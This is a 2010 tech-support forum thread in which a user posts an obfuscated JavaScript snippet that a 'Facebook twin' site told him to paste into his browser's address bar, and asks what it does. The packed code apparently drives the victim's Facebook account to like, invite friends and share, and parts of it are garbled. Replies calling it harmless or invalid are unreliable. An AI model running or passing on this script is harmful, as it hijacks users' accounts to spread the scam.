Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

What will this do?


  • Please log in to reply
4 replies to this topic

#1 Surma

Surma

  • Members
  • 140 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Sweden
  • Local time:04:01 PM

Posted 04 June 2010 - 11:01 AM

I found a site which claimed that it could "find your facebook twin" (find an avatar that was similar).
It asked me to press a few button combinations, essentially copy-pasting some stuff into the browser bar at the top.
This was the code it almost made me input:

java script:(function(){a='app128918030467540_iji';b='app128918030467540_aja';rew='app128918030467540_rew';qwe='app128918030467540_qwe';qtt='app128918030467540_qtt';eval(function(p,a,c,k,e,r){e=function©{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e©]=k[c]||e©;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e©+'\\b','g'),k[c]);return p}('P e=["\\p\\g\\l\\g\\I\\g\\k\\g\\h\\D","\\l\\h\\D\\k\\f","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\J\\D\\Q\\x","\\y\\g\\x\\x\\f\\j","\\g\\j\\j\\f\\z\\R\\K\\L\\S","\\p\\n\\k\\A\\f","\\l\\A\\o\\o\\f\\l\\h","\\k\\g\\G\\f\\q\\f","\\l\\k\\g\\j\\G","\\L\\r\\A\\l\\f\\v\\p\\f\\j\\h\\l","\\t\\z\\f\\n\\h\\f\\v\\p\\f\\j\\h","\\t\\k\\g\\t\\G","\\g\\j\\g\\h\\v\\p\\f\\j\\h","\\x\\g\\l\\u\\n\\h\\t\\y\\v\\p\\f\\j\\h","\\l\\f\\k\\f\\t\\h\\w\\n\\k\\k","\\l\\o\\q\\w\\g\\j\\p\\g\\h\\f\\w\\T\\r\\z\\q","\\H\\n\\U\\n\\V\\H\\l\\r\\t\\g\\n\\k\\w\\o\\z\\n\\u\\y\\H\\g\\j\\p\\g\\h\\f\\w\\x\\g\\n\\k\\r\\o\\W\\u\\y\\u","\\l\\A\\I\\q\\g\\h\\X\\g\\n\\k\\r\\o","\\g\\j\\u\\A\\h","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\l\\J\\D\\K\\n\\o\\Y\\n\\q\\f","\\Z\\y\\n\\z\\f","\\u\\r\\u\\w\\t\\r\\j\\h\\f\\j\\h"];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](B)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]]©;B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]]©;B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g]){F[i][e[13]]©}};m[e[13]]©;B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];},1k)},1l)},1m)},O);',62,85,'||||||||||||||variables|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||qtt|fs|SocialGraphManager|for|in|if|20|qwe|rew|21|2000|4000|3000'.split('|'),0,{}))})();

Does anyone have a clue what it could do? I dont want to run code without knowing what it does.

Edit: Disabled smilies

Edited by Surma, 04 June 2010 - 11:02 AM.

---My computer---
Manufacturer:HP Pavilion 061 CPU:Intel Pentium 4 640, 3200 MHz (16 x 200) RAM: 1024MB Motherboard:Asus PTGD1-LA Chipset:Intel Grantsdale i915P HDD:Main256GB Ext512GB Video:Radeon X600 Series Internet:DSL 2mb/s OS:Windows XP Home Edition SP3 Firefox+IExplorer AVG Internet Security

BC AdBot (Login to Remove)

 


#2 Billy O'Neal

Billy O'Neal

    Visual C++ STL Maintainer


  • Malware Response Team
  • 12,304 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Redmond, Washington
  • Local time:07:01 AM

Posted 04 June 2010 - 11:05 AM

It's been obfuscated. Good luck! :thumbsup:

Billy3
Twitter - My statements do not establish the official position of Microsoft Corporation, and are my own personal opinion. (But you already knew that, right?)
Posted Image

#3 Mr.VisualBasic

Mr.VisualBasic

  • Members
  • 41 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Memphis, TN
  • Local time:08:01 AM

Posted 04 June 2010 - 11:59 AM

Lol, good luck running the code. It doesn't do anything in the state you found it in.

#4 Romeo29

Romeo29

    Learning To Bleep


  • Members
  • 3,194 posts
  • OFFLINE
  •  
  • Gender:Not Telling
  • Location:127.0.0.1
  • Local time:09:01 AM

Posted 05 June 2010 - 06:11 AM

It appears to be invalid code to me.

BTW, Facebook has its own twin finder app (Facebook Doopelganger). Why use a 3rd party unsafe script?

#5 Wolfy87

Wolfy87

  • Members
  • 414 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:England
  • Local time:02:01 PM

Posted 13 June 2010 - 09:15 AM

Well to me it looks like a very, very, very messy preg_replace style function.
Although it really could be anything, and yes the link is for PHP but it gives you an idea of what I mean.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users